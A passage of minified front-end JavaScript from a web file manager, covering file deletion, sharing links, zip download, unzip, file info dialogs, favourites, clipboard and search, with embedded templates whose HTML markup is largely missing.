a&&a(),void 0):void 0},l=function(e,t,a,i){if(a=void 0==a?!1:a,i=void 0==i?!1:i,window.event&&window.event.shiftKey&&(i=!0),!(1>e.length)){var o=LNG.remove_title,s=LNG.remove_info,r=G.appHost+"explorer/pathDelete",l=n(e);if("share"==e[0].type&&(o=LNG.share_remove,s=LNG.share_remove_tips,r=G.appHost+"userShare/del"),i&&(s=LNG.remove_info_force,o=LNG.remove_title_force,r+="&shiftDelete=1"),("recycle-clear"==e[0].type||G.USER_RECYCLE&&G.thisPath==G.USER_RECYCLE||G.thisPath==core.pathFather(G.myhome)+"recycle_kod/")&&(s=LNG.recycle_clear_info,r=G.appHost+"explorer/pathDeleteRecycle",o=LNG.recycle_clear,"recycle-clear"==e[0].type&&(l="postEmpty=1")),e[0]&&e[0].path){var c=""+htmlEncode(core.pathThis(e[0].path))+"";s=e.length>1?c+' ... '+e.length+LNG.remove_item+"
      "+s:c+"
      "+s}var d=function(){$.ajax({url:r,type:"POST",dataType:"json",data:l,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){if(Tips.close(a),ShareData.frameTop("",function(e){e.ui.f5()}),"share"==e[0].type){G.selfShare=a.info;var i=$.dialog.list["share-dialog"];void 0!=i&&i.close()}o==LNG.recycle_clear?core.playSound("recycle_clear"):core.playSound("file_remove"),"function"==typeof t&&t(a)}})};a?d():$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:o,padding:"40px 40px",lock:!0,background:"#000",opacity:.1,content:"
      "+s+"
      ",ok:d,cancel:!0})}},c=function(e){if(core.authCheck("explorer.fileDownload",!0)&&!(1>e.length)){var t=G.appHost+"explorer/zipDownload";G.sharePage!==void 0&&(t=G.appHost+"share/zipDownload&user="+G.user+"&sid="+G.sid),$.ajax({url:t,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.zip_download_ready)},error:core.ajaxError,success:function(e){Tips.close(e),Tips.tips(e);var t=G.appHost+"explorer/fileDownloadRemove&path="+urlEncode(e.info);t+="&accessToken="+G.accessToken,G.sharePage!==void 0&&(t=G.appHost+"share/fileDownloadRemove&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e.info)),$.dialog({icon:"succeed",title:!1,time:2,content:LNG.download_ready+"..."}),$('').appendTo("body")}})}},d=function(e,t,a){1>e.length||(a||(a="zip"),$.ajax({url:G.appHost+"explorer/zip&fileType="+a,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.ziping)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof t&&t(e.info)}}))},p=function(e,t,a){if(e){var i=function(e){$.ajax({url:e,beforeSend:function(){Tips.loading(LNG.unziping)},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&t(e)}})},n=G.appHost+"explorer/unzip&path="+urlEncode(e);"toThis"==a&&(n+="&toThis=1"),"toFolder"==a?core.api.pathSelect({type:"folder",title:LNG.unzip_to},function(e){n+="&pathTo="+e,i(n)}):i(n)}},u=function(e){var t=e.path,a=core.pathPre(t);if(a==G.KOD_GROUP_PATH||a==G.KOD_GROUP_SHARE||a==G.KOD_USER_SHARE)return Tips.tips(LNG.path_can_not_share,"warning"),void 0;var i="folder"==e.type?"folder":"file";1>t.length||core.authCheck("userShare.set",!0)&&$.ajax({url:G.appHost+"userShare/checkByPath&path="+urlEncode(t),dataType:"json",error:core.ajaxError,success:function(e){if(e.code)f(e.data);else{G.selfShare=e.info;var a={path:t,type:i,name:core.pathThis(t)};h(a,function(e){e.code?(G.selfShare=e.info,ui.f5(),f(e.data)):(Tips.tips(e),f(void 0,function(){$(".content-info input[name=type]").val(i),$(".content-info input[name=path]").val(t),$(".content-info input[name=name]").val(core.pathThis(t)+"(1)"),"file"==i&&($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden"))}))})}}})},f=function(t,a){0!=$(".share-dialog").length&&$(".share-dialog").shake(3,30,100),e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){m(t),void 0!=a&&a()})},h=function(e,t){$.ajax({url:G.appHost+"userShare/set",data:e,type:"POST",dataType:"json",beforeSend:function(){$(".share-create-button").addClass("disabled")},error:function(){Tips.tips(LNG.error,!1)},success:function(e){$(".share-create-button").removeClass("disabled"),void 0!=t&&t(e)}})},m=function(t){var a=e("./tpl/share.html"),i=template.compile(a),n=i({LNG:LNG});$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,title:LNG.share,padding:"0",fixed:!0,content:n});var o="zh-CN"==G.lang?"ch":"en";$("#share-time").datetimepicker({format:"Y/m/d",formatDate:"Y/m/d",timepicker:!1,lang:o}),$("#share-time").unbind("blur").bind("blur",function(e){stopPP(e)});var s=function(e){if($(".share-setting-more").addClass("hidden"),void 0==e)$(".share-has-url").addClass("hidden"),$(".share-action .share-remove-button").addClass("hidden"),$(".content-info input[name=sid]").val(""),$(".content-info input[name=type]").val(""),$(".content-info input[name=name]").val(""),$(".content-info input[name=showName]").val(""),$(".content-info input[name=path]").val(""),$(".content-info input[name=timeTo]").val(""),$(".content-info input[name=sharePassword]").val(""),$(".share-view-info").addClass("hidden");else{e.canUpload===void 0&&(e.canUpload=""),t=e,e.showName||(e.showName=e.name),$(".content-info input[name=sid]").val(e.sid),$(".content-info input[name=type]").val(e.type),$(".content-info input[name=name]").val(e.name),$(".content-info input[name=showName]").val(e.showName),$(".content-info input[name=path]").val(e.path),$(".content-info input[name=timeTo]").val(e.timeTo),$(".content-info input[name=sharePassword]").val(e.sharePassword),$(".share-view-info").removeClass("hidden"),e.numDownload===void 0&&(e.numDownload=0),e.numView===void 0&&(e.numView=0);var a=LNG.share_view_num+e.numView+" "+LNG.share_download_num+e.numDownload;$(".share-view-info").html(a),"1"==e.codeRead?$(".content-info input[name=codeRead]").attr("checked","checked"):$(".content-info input[name=codeRead]").removeAttr("checked"),"1"==e.notDownload?$(".content-info input[name=notDownload]").attr("checked","checked"):$(".content-info input[name=notDownload]").removeAttr("checked"),"1"==e.canUpload?$(".content-info input[name=canUpload]").attr("checked","checked"):$(".content-info input[name=canUpload]").removeAttr("checked"),$(".share-has-url").removeClass("hidden"),"file"==e.type?($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden")):($(".label-code-read").removeClass("hidden"),$(".label-can-upload").removeClass("hidden"));var i=e.type;"folder"==e.type&&(i=1==e.codeRead?"codeRead":"folder");var n=G.appHost+"share/"+i+"&user="+G.userID+"&sid="+e.sid;$(".content-info .share-url").val(n),(e.timeTo||e.sharePassword||e.canUpload||e.codeRead||e.notDownload)&&$(".share-setting-more").removeClass("hidden"),$(".share-remove-button").removeClass("hidden"),$(".share-create-button").text(LNG.share_save)}},r=function(){$(".share-action .share-remove-button").unbind("click").click(function(){l([{type:"share",path:t.sid}],function(){ui.f5()})}),$(".content-info .share-more").unbind("click").click(function(){$(".share-setting-more").toggleClass("hidden")}),$(".share-action .share-create-button").unbind("click").click(function(){var e="";$(".share-dialog .content-info input[name]").each(function(){var t=urlEncode($(this).val());"checkbox"==$(this).attr("type")&&(t=$(this).attr("checked")?"1":""),e+="&"+$(this).attr("name")+"="+t}),h(e,function(e){e.code?(Tips.tips(LNG.success,!0),G.selfShare=e.info,ui.f5(),s(e.data),$(".share-create-button").text(LNG.share_save)):Tips.tips(e)})}),$(".content-info .open-window").unbind("click").bind("click",function(){window.open($("input.share-url").val())}),$(".content-info .qrcode").unbind("click").bind("click",function(){core.qrcode($("input.share-url").val())});var e=$("input.share-url"),a=e.get(0);e.unbind("hover click").bind("hover click",function(){$(this).focus();var t=e.val().length;if($.browser.msie){var i=a.createTextRange();i.moveEnd("character",-a.value.length),i.moveEnd("character",t),i.moveStart("character",0),i.select()}else a.setSelectionRange(0,t)})};s(t),r()},v=function(e){$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(e),dataType:"json",success:function(e){Tips.tips(e)}})},g=function(e,t,a,i,n){if(!(1>e.length)){var o,s=G.myDesktop;i&&(s=core.pathFather(e)),o="folder"==a?"ui.path.list(hashDecode('"+hashEncode(e)+"'));":"ui.path.open(hashDecode('"+hashEncode(e)+"'));";var r=urlEncode(s+t+".oexe"),l=core.getPathIcon(e);""==l.icon&&(l.icon=a),$.ajax({url:G.appHost+"explorer/mkfile&path="+r,type:"POST",dataType:"json",data:{content:jsonEncode({type:"app_link",content:o,icon:l.icon})},success:function(e){Tips.tips(e),e.code&&(ShareData.frameTop("",function(e){e.ui.f5()}),"function"==typeof n&&n(e.info))}})}},b=function(e,t){if(!(1>e.length)){var a=core.pathThis(e),i=core.pathFather(e);jsrun="core.explorerCode('"+urlEncode(e)+"');";var n=urlEncode(i+a+"_project.oexe");$.ajax({url:G.appHost+"explorer/mkfile&path="+n,type:"POST",dataType:"json",data:'content={"type":"app_link","content":"'+jsrun+'","icon":"folder.png"}',success:function(e){e.code&&"function"==typeof t&&t(e.info)}})}},y=function(e,t,a){if(e){var i=G.appHost+"explorer/imageRotate&rotate="+t+"&path="+urlEncode(e);$.ajax({url:i,beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){return e?(Tips.close(e),e.code&&"function"==typeof a&&a(e),void 0):(Tips.close(LNG.php_env_error_gd,!1),void 0)}})}},k=function(t){var a={};a.fileInfo=e("./tpl/fileinfo/fileInfo.html"),a.pathInfo=e("./tpl/fileinfo/pathInfo.html"),a.pathInfoMore=e("./tpl/fileinfo/pathInfoMore.html"),1>t.length&&(t=[{path:G.thisPath,type:"folder"}]);var i="info";1==t.length&&(i="file"==t[0].type?core.pathExt(t[0].path):"folder"),Tips.loading(LNG.getting),core.fileInfo(n(t),function(e){if(!e.code)return Tips.close(e),void 0;Tips.close(LNG.get_success,!0);var n="pathInfoMore",o=LNG.info;1==t.length&&(n="folder"==t[0].type?"pathInfo":"fileInfo",o=core.pathThis(t[0].path),o.length>15&&(o=o.substr(0,15)+"... "+LNG.info));var s=template.compile(a[n]),r=UUID();e.data.is_root=G.isRoot,e.data.LNG=LNG,e.data.atime=date(LNG.time_type_info,e.data.atime),e.data.ctime=date(LNG.time_type_info,e.data.ctime),e.data.mtime=date(LNG.time_type_info,e.data.mtime),e.data.sizeFriendly=pathTools.fileSize(e.data.size);var l=$.dialog({id:r,padding:5,ico:core.iconSmall(i),fixed:!0,title:o,content:s(e.data),ok:!0}),c=15*$(".aui-outer .pathinfo").length;l.DOM.wrap.css({left:"+="+c+"px",top:"+="+c+"px"}),x(r,t)})},x=function(e,t){var a=$("."+e);a.find(".open-window").bind("click",function(){window.open(a.find("input.download-url").val())}),a.find(".qrcode").unbind("click").bind("click",function(){core.qrcode(a.find("input.download-url").val(),a.find(".qrcode").get(0))});var i=a.find(".file-md5-loading");if(1==i.length){var o=n(t);o+="&getMd5=1",core.fileInfo(o,function(e){i.removeClass("file-md5-loading"),e.code?i.html(e.data.fileMd5):i.html(LNG.error)})}var s=a.find("input.download-url"),r=s.get(0);s.unbind("hover click").bind("hover click",function(){$(this).focus();var e=s.val().length;if($.browser.msie){var t=r.createTextRange();t.moveEnd("character",-r.value.length),t.moveEnd("character",e),t.moveStart("character",0),t.select()}else r.setSelectionRange(0,e)}),a.find(".edit-chmod").click(function(){var e=$(this).parent().find("input"),a=$(this);$.ajax({url:G.appHost+"explorer/pathChmod&mod="+e.val(),type:"POST",data:n(t),beforeSend:function(){a.text(LNG.loading)},error:function(){a.text(LNG.button_save)},success:function(e){a.text(e.data).animate({opacity:.6},400,0).delay(1e3).animate({opacity:1},200,0,function(){a.text(LNG.button_save)}),e.code&&ui.f5()}})})},w=function(e,t,a){var i=function(){$.ajax({url:G.appHost+"fav/del&name="+urlEncode(e),dataType:"json",async:!1,success:function(e){"function"==typeof t&&t(e)}})};return a?(i(),void 0):($.dialog({id:"dialog-fav-remove",fixed:!0,icon:"question",title:LNG.fav_remove,width:200,padding:"40px 20px",content:LNG.fav_remove+"?",ok:i,cancel:!0}),void 0)},_=function(e){if(e){if(-1==trim(core.pathClear(e.path),"/").indexOf("/")){var t=core.getPathIcon(e.path,e.name);""!=t.icon&&(e.ext=t.icon,e.name=t.name)}"/"==e.path&&(e.name="Home"),$.ajax({url:G.appHost+"fav/add",dataType:"json",data:e,success:function(e){Tips.tips(e),e.code&&!core.isApp("desktop")&&ui.tree.refreshFav()}})}},N=function(e){var t={};return t.type=e.find("input[type=radio]:checked").val(),t.content=e.find("textarea").val(),t.group=e.find("[name=group]").val(),e.find("input[type=text]").each(function(){var e=$(this).attr("name");t[e]=$(this).val()}),e.find("input[type=checkbox]").each(function(){var e=$(this).attr("name");t[e]="checked"==$(this).attr("checked")?1:0}),t},L=function(e){e.find(".type input").change(function(){var t=$(this).attr("apptype");e.find("[data-type]").addClass("hidden"),e.find("[data-type="+t+"]").removeClass("hidden")}),e.find(".app-edit-select-icon").unbind("click").bind("click",function(){var t=G.basicPath+"static/images/file_icon/icon_app/";G.isRoot||(t=""),core.api.pathSelect({type:"file",title:LNG.path_api_select_file,firstPath:t},function(t){var t=core.path2url(t);e.find(".app-edit-select-icon-input").val(t)})}),e.find(".size-full").unbind("click").bind("click",function(){var t=$(this).prop("checked");t?(e.find("[name=width]").val("100%"),e.find("[name=height]").val("100%")):(e.find("[name=width]").val("800"),e.find("[name=height]").val("600"))})},C=function(t,a,i){var n,o,s,r=LNG.app_create,l=UUID(),c=e("./tpl/appEdit.html"),d=template.compile(c);switch(void 0==i&&(i="userEdit"),"rootEdit"==i&&(t=t),"userEdit"==i||"rootEdit"==i?(r=LNG.app_edit,s=d({LNG:LNG,uuid:l,data:t,appType:G.settings.appType})):s=d({LNG:LNG,uuid:l,data:{},appType:G.settings.appType}),$.dialog({fixed:!0,width:450,id:l,padding:15,title:r,content:s,button:[{name:LNG.preview,callback:function(){return core.openApp(N(n)),!1}},{name:LNG.button_save,focus:!0,callback:function(){var e=N(n);switch(i){case"userAdd":var s=urlEncode(G.thisPath+e.name);o=G.appHost+"app/userApp&action=add&path="+s;break;case"userEdit":o=G.appHost+"app/userApp&path="+urlEncode(t.path);break;case"rootAdd":o=G.appHost+"app/add&name="+urlEncode(e.name);break;case"rootEdit":o=G.appHost+"app/edit&name="+urlEncode(e.name)+"&old_name="+urlEncode(t.name);break;default:}$.ajax({url:o,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(e))},beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){if(Tips.close(e),e.code)if("rootEdit"==i||"rootAdd"==i){if(!e.code)return;ShareData.frameTop("Openapp_store",function(e){e.App.reload()})}else"function"==typeof a?a():ui.f5()}})}}]}),n=$("."+l),G.isRoot||$(".appbox .appline .right a.open").remove(),t.group&&n.find("option").eq(t.group).attr("selected",1),n.find(".aui-content").css("overflow","inherit"),i){case"userEdit":n.find(".name").addClass("hidden"),n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("option[value="+t.group+"]").attr("checked",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;case"userAdd":n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootAdd":n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootEdit":n.find("option[value="+t.group+"]").attr("selected",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;default:}L(n)},T=function(){core.appStore()},S=function(e){e&&4>e.length&&"http"!=e.substring(0,4)||$.ajax({url:G.appHost+"app/getUrlTitle&url="+e,dataType:"json",beforeSend:function(){Tips.loading()},success:function(t){var a=t.data;a=a.replace(/[\/\\]/g,"_"),Tips.close(t);var i={content:e,type:"url",desc:"",group:"others",icon:"internet.png",name:a,resize:1,simple:0,height:"70%",width:"90%"},n=urlEncode(G.thisPath+a);e=G.appHost+"app/userApp&action=add&path="+n,$.ajax({url:e,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(i))},success:function(e){Tips.close(e),e.code&&ui.f5()}})}})};return{makeJson:n,appEdit:C,appList:T,appAddURL:S,share:u,shareBox:f,setBackground:v,createLink:g,createProject:b,imageRotate:y,newFile:o,newFolder:s,rname:r,zipDownload:c,zip:d,unZip:p,info:k,remove:l,fav:_,favRemove:w}}),define("app/path/tpl/fileinfo/fileInfo.html",[],"
      \n {{if downloadPath}}\n
      \n
      {{LNG.download_address}}:
      \n
      \n \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n {{/if}}\n\n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n\n {{if fileMd5}}\n
      \n
      MD5:
      \n
      {{fileMd5}}
      \n
      \n
      \n {{/if}}\n\n {{if imageSize}}\n
      \n
      {{LNG.image_size}}:
      \n
      {{imageSize.width}} × {{imageSize.height}}
      \n
      \n
      \n {{/if}}\n\n
      \n\n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n \n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/fileinfo/pathInfo.html",[],"
      \n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n
      \n
      {{LNG.contain}}:
      \n
      {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n \n
      \n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n\n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/share.html",[],'
      \n
      \n
      {{LNG.share_title}}
      \n \n
      \n
      \n
      \n {{LNG.share_path}}:\n \n
      \n
      \n
      \n {{LNG.share_name}}:\n \n \n \n \n \n
      \n
      \n\n \n\n \n
      \n \n
      '),define("app/path/tpl/fileinfo/pathInfoMore.html",[],"
      \n
      \n
      {{LNG.info}}:
      \n
      \n {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n \n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n
      \n"),define("app/path/tpl/appEdit.html",[],"
      \n
      \n
      {{LNG.name}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_desc}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_icon}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_group}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_type}}
      \n
      \n \n \n \n \n \n \n
      \n
      \n
      \n\n
      \n
      {{LNG.app_display}}
      \n
      \n \n \n \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_size}}
      \n
      \n ({{LNG.width}})  \n ({{LNG.height}})\n\n \n \n
      \n
      \n
      \n
      \n \n \n
      {{LNG.app_url}}
      \n
      \n
      \n
      \n
      \n"),define("app/path/clipboard",[],function(){var e=function(e){return ui.path.pathOperate.makeJson(e) },t=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCopy",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},a=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCute",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},i=function(e,t){e&&(Tips.loading(LNG.moving),setTimeout(function(){var a=G.appHost+"explorer/pathPast&path="+urlEncode(e);$.ajax({url:a,dataType:"json",error:core.ajaxError,success:function(e){Tips.close(e.data,e.code),"function"==typeof t&&t(e.info)}})},50))},n=function(t,a,i){a&&$.ajax({url:G.appHost+"explorer/pathCuteDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/"),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}})},o=function(t,a,i,n){a&&(void 0==n&&(n=0),$.ajax({url:G.appHost+"explorer/pathCopyDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/")+"&filename_auto="+Number(n),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}}))},s=function(e,t){var a="style='height:150px;border-left: 3px solid #def;overflow:auto;margin:20px;background: #f0f8ff;padding:20px;width:300px'",i="
      "+LNG.clipboard_null+"
      ";if(0!=e.length){i="
      "+LNG.clipboard_state+LNG[t]+"
      ";for(var n=40,o=0;e.length>o;o++){var s=e[o],r=s.path;r=n>r.length?r:"..."+r.substr(-n),i+="
      "+s.type+": "+r+""}i+='
      "}return i},r=function(){$.ajax({url:G.appHost+"explorer/clipboard",dataType:"json",error:core.ajaxError,success:function(e){e.code&&($.dialog({id:"dialog-clipboard",title:LNG.clipboard,width:400,content:s(e.data,e.info)}),$(".clipboard-clear").one("click",function(){Tips.tips(LNG.success),$.get(G.appHost+"explorer/clipboard&clear=ok"),$.dialog.list["dialog-clipboard"].close()}))}})},l=function(){var e=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e},t=function(e){if(e.clipboardData&&e.clipboardData.items){var t=Array.prototype.filter.call(e.clipboardData.items,function(e){return e.type.indexOf("image")>=0});Array.prototype.forEach.call(t,function(e){var t=new FileReader;t.onloadend=function(){a(this.result)},t.readAsDataURL(e.getAsFile())})}},a=function(t){if(!core.uploadCheck("explorer.serverDownload"))return!1;t=t.replace("data:image/png;base64,","");var a=date("20yymd-his")+".png";$.ajax({type:"POST",dataType:"json",url:e()+"&base64Upload=1&upload_to="+urlEncode(G.thisPath)+"&name="+a,data:{file:t},beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){Tips.close(e)}})};$(window).on("paste",t)};return l(),{copy:t,cute:a,past:i,cuteDrag:n,copyDrag:o,clipboard:r}}),define("app/path/search",[],function(e){var t=e("./tpl/search.html"),a=e("./tpl/searchList.html");return function(e,i){i||(i=G.thisPath);var n,o,s=function(){var a=trim(core.pathClear(i),"/");if(0==a.indexOf(G.KOD_USER_SHARE)&&-1==a.indexOf("/")||a==G.KOD_USER_FAV||a==G.KOD_GROUP_ROOT_ALL)return Tips.tips(LNG.path_cannot_search,!1),void 0;template.helper("searchResultPrase",c);var s=template.compile(t);0==$(".dialog-do-search").length?(n=$.dialog({id:"dialog-do-search",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG.search,width:460,height:480,content:s({LNG:LNG})}),o=p(),o.path=i,""!=e&&(o.search=e),$("#search-path").val(o.path),$("#search-value").val(o.search),d()):($.dialog.list["dialog-do-search"].display(!0),e&&$("#search-value").val(e),$("#search-path").val(i),l())},r=function(){return o={search:$("#search-value").val(),path:$("#search-path").val(),is_content:Number($("#search-is-content").is(":checked")),is_case:Number($("#search-is-case").is(":checked")),ext:$("#search-ext").val()}},l=function(){r(),f(o)},c=function(e){var t=htmlEncode($("#search-value").val());if(e=htmlEncode(e),o.is_case)e=e.replace(t,''+t+"");else{var a=e.toLowerCase().indexOf(t.toLowerCase());e=e.substr(0,a)+''+e.substr(a,t.length)+""+e.substr(a+t.length)}return e},d=function(){$("#search-value").die("keyup").live("keyup",function(){core.isApp("editor")||ui.path.setSearchByStr($(this).val())}),$("#search-value,#search-ext,#search-path").keyEnter(l),$(".search-header .btn").die("click").live("click",l),$(".search-result .file-item .file-info").die("click").live("click",function(e){var t=$(this).parent();return t.toggleClass("open"),t.find(".result-item").slideToggle(200),stopPP(e),!1}),$(".search-result .file-item .file-info .goto").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path")),i=core.pathFather(a);return core.openPath(i),setTimeout(function(){core.isApp("explorer")&&ui.path.setSelectByFilename(a)},200),stopPP(e),!1}),$(".search-result .file-item .file-info .title").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));return kodApp.setLastOpenTarget(t),kodApp.open(a,t.attr("data-ext")),stopPP(e),!1}),$(".search-result .file-item .result-info").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));$(".search-result .file-item .result-info.this").removeClass("this"),$(this).addClass("this");var i=parseInt($(this).find(".line").attr("data-line"));return ShareData.data("FILE_SEARCH_AT",{search:$("#search-value").val(),line:i,lineIndex:$(this).parent().find("[data-line="+i+"]").index($(this).find(".line"))}),kodApp.open(a,t.attr("data-ext"),"aceEditor"),stopPP(e),!1}),$(".search-header input[type=checkbox]").on("click",function(){r(),p(o)})},p=function(e){var t="box_search_config";if(void 0==e){var e=LocalData.getConfig(t);return e||(e={search:"",is_content:0,is_case:0,ext:""}),$("#search-value").val(e.search).textSelect(),e.is_content?$("#search-is-content").attr("checked","checked"):$("#search-is-content").removeAttr("checked"),e.is_case?$("#search-is-case").attr("checked","checked"):$("#search-is-case").removeAttr("checked"),$("#search-ext").val(e.ext),e}return LocalData.setConfig(t,e)},u=function(e){var t=$(".file-items"),i=$(".search-desc");if(!e.code)return i.html(e.data),t.html(""),void 0;if(0==e.data.fileList.length&&0==e.data.folderList.length)return i.html(LNG.search_null),t.html(""),void 0;var n=template.compile(a);if(t.html(n({code:e.code,data:e.data,LNG:LNG})),o.is_content){for(var s=e.data.fileList,r=0,l=0;s.length>l;l++)s[l].searchInfo&&(r+=s[l].searchInfo.length);i.html(LNG.search_result+": "+r+"(in "+s.length+" files)"),e.data.error_info&&i.html(""+LNG.seach_result_too_more+"")}else i.html(e.data.fileList.length+" "+LNG.file+", "+e.data.folderList.length+LNG.folder+".")},f=function(e){p(e),$("#search-value").textFocus();var t=$(".file-items"),a=$(".search-desc");if(!e.search||!e.path)return a.html(LNG.search_info),t.html(""),void 0;var i=G.appHost+"explorer/search";G.sharePage!==void 0&&(i=G.appHost+"share/search&user="+G.user+"&sid="+G.sid),$.ajax({url:i,dataType:"json",type:"POST",data:e,beforeSend:function(){a.hide().html(LNG.searching+'').fadeIn(100)},error:function(){core.ajaxError(),a.html(LNG.error)},success:function(e){u(e)}})};s()}}),define("app/path/tpl/search.html",[],"\n\n"),define("app/path/tpl/searchList.html",[],'\n{{each data.folderList v i}}\n
    • \n
      \n \n {{\'folder\' |core.icon}}\n {{v.name | searchResultPrase}}\n \n
      \n
    • \n{{/each}}\n\n\n{{each data.fileList v i}}\n {{if v.searchInfo}}\n
    • \n
      \n \n {{v.ext |core.icon}}\n \n {{v.name | kod.window.htmlEncode}}\n \n {{v.searchInfo.length}}\n \n
      \n
        \n {{each v.searchInfo value index}}\n
      • \n {{value.line}}:\n {{@value.str | searchResultPrase}}\n
      • \n {{/each}}\n
      \n
    • \n {{else}}\n
    • \n
      \n \n {{v.ext |core.icon}}\n {{v.name | searchResultPrase}}\n \n
      \n
